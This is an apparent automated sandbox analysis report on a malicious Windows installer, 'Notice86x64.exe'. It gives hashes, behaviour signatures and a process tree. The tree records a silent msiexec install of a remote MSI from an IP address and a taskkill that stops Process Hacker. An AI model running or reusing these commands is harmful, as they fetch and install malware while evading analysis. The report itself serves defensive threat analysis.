Analysis

  • max time kernel
    69s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/05/2023, 13:09

General

  • Target

    Notice86x64.exe

  • Size

    6.9MB

  • MD5

    bd294af66e42c317ff4bde406043e918

  • SHA1

    c508e4ca273dffca5966cb41f13ec3bb78034108

  • SHA256

    4645c34b63cfe2e839c31994ae00756b38bae0212aceaa8875d69c176e14de3c

  • SHA512

    1e66e6599a6d0b1d9ef1426349bb69e0379997f7d6fbc8f518033062d617af86588c668a8a29841798df2f87566f28834651b9cc57af6e1951eeda432b3fa357

  • SSDEEP

    98304:qSipzN7QKKSW+Aic8vBquYafPwy46kubjHZDMRpSwme6K8VrpPobS+I4:qaSW+Aic8ZqRawhubTiX0etc+I4

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe
    "C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3340
    • C:\Users\Admin\AppData\Local\Temp\is-QI2UK.tmp\Notice86x64.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-QI2UK.tmp\Notice86x64.tmp" /SL5="$A014C,991232,991232,C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3276
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /im processhacker.exe /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3132
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im processhacker.exe /f
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1496
      • C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe
        "C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe" /verysilent /sp-
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2220
        • C:\Users\Admin\AppData\Local\Temp\is-4HNK7.tmp\Notice86x64.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-4HNK7.tmp\Notice86x64.tmp" /SL5="$B014C,991232,991232,C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe" /verysilent /sp-
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:3124
          • C:\Windows\SysWOW64\msiexec.exe
            "C:\Windows\System32\msiexec.exe" /qn /i http://94.142.138.14/tit/driv.msi
            5⤵
            • Use of msiexec (install) with remote resource
            • Suspicious use of AdjustPrivilegeToken
            PID:5044
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\dl.cmd""
            5⤵
              PID:4392
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Blocklisted process makes network request
      • Enumerates connected drives
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4376
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 5E7521729E50998D543B2661F48EB6B0
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1388
        • C:\Windows\SysWOW64\ICACLS.EXE
          "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-6ed4a302-be20-46f4-9909-72b8ffcaac1f\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
          3⤵
          • Modifies file permissions
          PID:2056
        • C:\Windows\SysWOW64\EXPAND.EXE
          "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
          3⤵
          • Drops file in Windows directory
          PID:4776
        • C:\Users\Admin\AppData\Local\Temp\MW-6ed4a302-be20-46f4-9909-72b8ffcaac1f\files\x64_t.exe
          "C:\Users\Admin\AppData\Local\Temp\MW-6ed4a302-be20-46f4-9909-72b8ffcaac1f\files\x64_t.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4172
          • C:\Windows\SysWOW64\calc.exe
            calc.exe
            4⤵
            • Modifies registry class
            PID:4460
        • C:\Windows\SysWOW64\ICACLS.EXE
          "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-6ed4a302-be20-46f4-9909-72b8ffcaac1f\." /SETINTEGRITYLEVEL (CI)(OI)LOW
          3⤵
          • Modifies file permissions
          PID:1788
    • C:\Windows\system32\OpenWith.exe
      C:\Windows\system32\OpenWith.exe -Embedding
      1⤵
      • Suspicious use of SetWindowsHookEx
      PID:1312

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\MW-6ed4a302-be20-46f4-9909-72b8ffcaac1f\files.cab

      Filesize

      6.1MB

      MD5

      8a28b0f498da8ce64e49c0d565723e6c

      SHA1

      3b9a9e091b3ded7aee959b154418a44380585f82

      SHA256

      1f37853be7f3057c64d3b15e323ee7f9a71390403ecab8f830b6be383dc34241

      SHA512

      f02fbae3514a213af48a25b6c1a183fecfef08f14f50650a5b1a12c26e37a30675d8e541371bd7291b46a0a1b82e9133ea05f8b0cec8d8edf925099bf6a75f89

    • C:\Users\Admin\AppData\Local\Temp\MW-6ed4a302-be20-46f4-9909-72b8ffcaac1f\files\x64_t.exe

      Filesize

      6.1MB

      MD5

      9a3bad7d8516216695887acc9668cda1

      SHA1

      a89c097138e5aab1f35b9a03900600057d907690

      SHA256

      4862618fcf15ba4ad15df35a8dcb0bdb79647b455fea6c6937c7d050815494b0

      SHA512

      be94a916846edd622034283852e8b5539b1057f5de2bc30772f4541e90f3fa03992104261f27b78efe0b6bb8880cb3aaba0e2e59e16b85883469dc5a0cddda37

    • C:\Users\Admin\AppData\Local\Temp\MW-6ed4a302-be20-46f4-9909-72b8ffcaac1f\files\x64_t.exe

      Filesize

      6.1MB

      MD5

      9a3bad7d8516216695887acc9668cda1

      SHA1

      a89c097138e5aab1f35b9a03900600057d907690

      SHA256

      4862618fcf15ba4ad15df35a8dcb0bdb79647b455fea6c6937c7d050815494b0

      SHA512

      be94a916846edd622034283852e8b5539b1057f5de2bc30772f4541e90f3fa03992104261f27b78efe0b6bb8880cb3aaba0e2e59e16b85883469dc5a0cddda37

    • C:\Users\Admin\AppData\Local\Temp\MW-6ed4a302-be20-46f4-9909-72b8ffcaac1f\msiwrapper.ini

      Filesize

      1KB

      MD5

      0caee4e7965db6400911dcc68c7990df

      SHA1

      ae127df4dfe499fb46984109e14caab2454faa84

      SHA256

      72941c2ccd686753c6d78a942d2952bf6ebd3ab58e5e15aac9b4be2a9f91e3e5

      SHA512

      9b94b81987faed34f3da4caa89ec7d5f0ab954125fb5d82559100b5e2b133dd434a689664ab5c8f962b8898169abf546f93253042296f63ce68eef92e753a590

    • C:\Users\Admin\AppData\Local\Temp\MW-6ed4a302-be20-46f4-9909-72b8ffcaac1f\msiwrapper.ini

      Filesize

      1KB

      MD5

      dbb0f27c88049066f0a094f46002d636

      SHA1

      003824892f699e90d6f7b631e765718d519ef1cf

      SHA256

      1b274247c8dc22fa93f4a6a8907ab885875fdadee4eeaa91ae55f2f58ec78ea7

      SHA512

      0e912565c2a605413440fed8d6b2ce41a22d316e1f81d6d3822d892ec77f4be3b3d34af5a4c3e2d7b8019613255cea43835778cc73bf949f1b9476c4abf52ebc

    • C:\Users\Admin\AppData\Local\Temp\MW-6ed4a302-be20-46f4-9909-72b8ffcaac1f\msiwrapper.ini

      Filesize

      1KB

      MD5

      dbb0f27c88049066f0a094f46002d636

      SHA1

      003824892f699e90d6f7b631e765718d519ef1cf

      SHA256

      1b274247c8dc22fa93f4a6a8907ab885875fdadee4eeaa91ae55f2f58ec78ea7

      SHA512

      0e912565c2a605413440fed8d6b2ce41a22d316e1f81d6d3822d892ec77f4be3b3d34af5a4c3e2d7b8019613255cea43835778cc73bf949f1b9476c4abf52ebc

    • C:\Users\Admin\AppData\Local\Temp\MW-6ed4a302-be20-46f4-9909-72b8ffcaac1f\msiwrapper.ini

      Filesize

      1KB

      MD5

      3b5a724977dcec0997fdc7b5d90a0934

      SHA1

      96797316f68fbaa97c9a127ab6f91607c954bac0

      SHA256

      58ae0b500d1675c8530164f2271c9ed68e64a70e5beb7ca87eee8713a94cd5f6

      SHA512

      66a3031fb4499c64ebfdfea607170bf0034b8dbdfe01dde5d4895ff57634d58ca16d6e489eaccf0b4fb28a4a0563a2943b3386e33a49a8ba0852c2683cb9ace2

    • C:\Users\Admin\AppData\Local\Temp\dl.cmd

      Filesize

      144B

      MD5

      ecb0fdb16b35747e7f77642c4c4a8520

      SHA1

      57b93f1ff87b0d46846f316dbb2754a6ba18d60d

      SHA256

      4a268df350447ea28f13d8b307dc3f70d1a5ca85c75673e95c8a3dafd9f2ea16

      SHA512

      293baa8858a7635a679dd820fca2c054f41e7d9498d69eca07707c47083d31f3e07a392c9b2c6535e79a2cf82a6d293b549447433b3a44d0dcc9dbe10dc80218

    • C:\Users\Admin\AppData\Local\Temp\is-4HNK7.tmp\Notice86x64.tmp

      Filesize

      3.1MB

      MD5

      655b822ebcb631eaeb14b90aac2a4a5d

      SHA1

      8d18301d578769bf8316733a95176dc117e2d278

      SHA256

      63a18a443c7b6489b4aaf393b2b3369ef9597a50834f90a844de1005d845d487

      SHA512

      6d09140eb8329eeb8de5d67055d2234689685156fc302e77707490a8d2c10ae49582bfe31c5e358d2d3d4859e0f4babab5a74461abb8d9351c0b6cf52792c49f

    • C:\Users\Admin\AppData\Local\Temp\is-QI2UK.tmp\Notice86x64.tmp

      Filesize

      3.1MB

      MD5

      655b822ebcb631eaeb14b90aac2a4a5d

      SHA1

      8d18301d578769bf8316733a95176dc117e2d278

      SHA256

      63a18a443c7b6489b4aaf393b2b3369ef9597a50834f90a844de1005d845d487

      SHA512

      6d09140eb8329eeb8de5d67055d2234689685156fc302e77707490a8d2c10ae49582bfe31c5e358d2d3d4859e0f4babab5a74461abb8d9351c0b6cf52792c49f

    • C:\Windows\Installer\MSIAC90.tmp

      Filesize

      6.5MB

      MD5

      b145881a72eb895a237945b6f37f87b3

      SHA1

      d7a075762597df5984bbdfd47808d4e13776fe17

      SHA256

      394a101a13792aa062a2f8dbb7f8f1cc2b7b5e9ea0fc0e57f40197dfc525639a

      SHA512

      87c2663e5022aedd9baf4b8b0f45e4c1d86cdde16bb81ac766d0a7515a2870381a41e8cd2ca2f16c141e6c716a3c4d233b6692a082bc109414056c69fdcc3b48

    • C:\Windows\Installer\MSIB6C3.tmp

      Filesize

      208KB

      MD5

      d82b3fb861129c5d71f0cd2874f97216

      SHA1

      f3fe341d79224126e950d2691d574d147102b18d

      SHA256

      107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c

      SHA512

      244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b

    • C:\Windows\Installer\MSIB6C3.tmp

      Filesize

      208KB

      MD5

      d82b3fb861129c5d71f0cd2874f97216

      SHA1

      f3fe341d79224126e950d2691d574d147102b18d

      SHA256

      107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c

      SHA512

      244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b

    • C:\Windows\Installer\MSIC4CF.tmp

      Filesize

      208KB

      MD5

      d82b3fb861129c5d71f0cd2874f97216

      SHA1

      f3fe341d79224126e950d2691d574d147102b18d

      SHA256

      107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c

      SHA512

      244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b

    • C:\Windows\Installer\MSIC4CF.tmp

      Filesize

      208KB

      MD5

      d82b3fb861129c5d71f0cd2874f97216

      SHA1

      f3fe341d79224126e950d2691d574d147102b18d

      SHA256

      107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c

      SHA512

      244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b

    • memory/2220-141-0x0000000000400000-0x00000000004FF000-memory.dmp

      Filesize

      1020KB

    • memory/2220-155-0x0000000000400000-0x00000000004FF000-memory.dmp

      Filesize

      1020KB

    • memory/3124-150-0x0000000000820000-0x0000000000821000-memory.dmp

      Filesize

      4KB

    • memory/3124-153-0x0000000000400000-0x000000000072D000-memory.dmp

      Filesize

      3.2MB

    • memory/3276-142-0x0000000000400000-0x000000000072D000-memory.dmp

      Filesize

      3.2MB

    • memory/3276-139-0x0000000002800000-0x0000000002801000-memory.dmp

      Filesize

      4KB

    • memory/3340-145-0x0000000000400000-0x00000000004FF000-memory.dmp

      Filesize

      1020KB

    • memory/3340-133-0x0000000000400000-0x00000000004FF000-memory.dmp

      Filesize

      1020KB